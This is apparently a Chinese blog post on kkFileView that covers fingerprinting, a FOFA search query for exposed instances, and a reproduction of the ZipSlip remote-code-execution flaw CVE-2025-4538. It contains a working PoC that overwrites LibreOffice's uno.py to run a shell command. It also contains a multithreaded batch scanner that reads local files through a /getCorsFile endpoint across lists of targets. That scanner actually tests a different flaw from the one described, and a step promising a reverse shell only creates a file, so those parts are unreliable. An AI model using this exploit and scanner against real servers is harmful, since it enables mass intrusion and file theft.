kkFileView文件预览特征及漏洞复现

kkFileView是一个文档预览解决方案。

Web特征

默认端口为8012,访问即为首页:

image-20251123221728401

默认标题为:kkFileView演示首页

核心预览接口:/onlinePreview

image-20251123222225153

fofa语法:body="/onlinePreview?url"

漏洞复现

CVE-2025-4538(ZipSlip 文件上传导致RCE)

利用该漏洞,允许攻击者向服务器任意目录下写入文件,导致任意命令执行漏洞。

影响范围:kkFileView ≤ 4.4.0-beta

复现示例

法一:手工

1、生成payload

修改并执行poc.py,生成POC文件test.zip到当前目录下(这里是创建一个文件作为验证):

python '.\kkFileView ZipSlip CVE-2025-4538-poc.py'

//poc内容:
import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'vulhub'
        binary2 = b"import os\nos.system('touch /tmp/successHacked')\n"
        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
        # info = zipfile.ZipInfo("test.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e
image-20251123222839877

2、上传payload

上传test.zipsample.odt两个文件到kkFileView服务中:

image-20251123223654404

3、触发漏洞反弹shell

先点击test.zip的“预览”按钮,可以看到zip压缩包中的文件列表:

image-20251123223724291

然后点击sample.odt的“预览”按钮,触发代码执行漏洞

image-20251124094513977

法二:自动化检测exp

通过python脚本对目标进行批量检测

import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import re
import random

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

def get_ua():
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
           '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
          )
  return ua

def wirte_targets(vurl, filename):
  with open(filename, "a+") as f:
    f.write(vurl + "\n")

def check_url(url):
  vulnurl=url + "/getCorsFile?urlPath=file:///c://windows/system32/drivers/etc"
  headers = {
    'User-Agent': get_ua(),
  }
  try:
    res = requests.get(vulnurl, verify=False, allow_redirects=False, headers=headers,timeout=5)
    if 'hosts' in res.text:
      print("\033[32m[+]{} is vulnerable\033[0m".format(url))
      wirte_targets(vulnurl,"vuln.txt")
    else:
      print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
  except Exception as e:
    print("\033[34m[!]{} request false.\033[0m".format(url))
    pass


def multithreading(url_list, pools=5):
  works = []
  for i in url_list:
    # works.append((func_params, None))
    works.append(i)
  # print(works)
  pool = threadpool.ThreadPool(pools)
  reqs = threadpool.makeRequests(check_url, works)
  [pool.putRequest(req) for req in reqs]
  pool.wait()


if __name__ == '__main__':
  arg=ArgumentParser(description='check_url By m2')
  arg.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  arg.add_argument("-f",
            "--file",
            help="Target URL; Example:url.txt")
  args=arg.parse_args()
  url=args.url
  filename=args.file
  print("[+]任务开始.....")
  start=time()
  if url != None and filename == None:
    check_url(url)
  elif url == None and filename != None:
    for i in open(filename):
      i=i.replace('\n','')
      url_list.append(i)
    multithreading(url_list,10)
  end=time()
  print('任务完成,用时%ds.' %(end-start))
posted @ 2025-12-02 12:52  shinianyunyan  阅读(147)  评论(0)    收藏  举报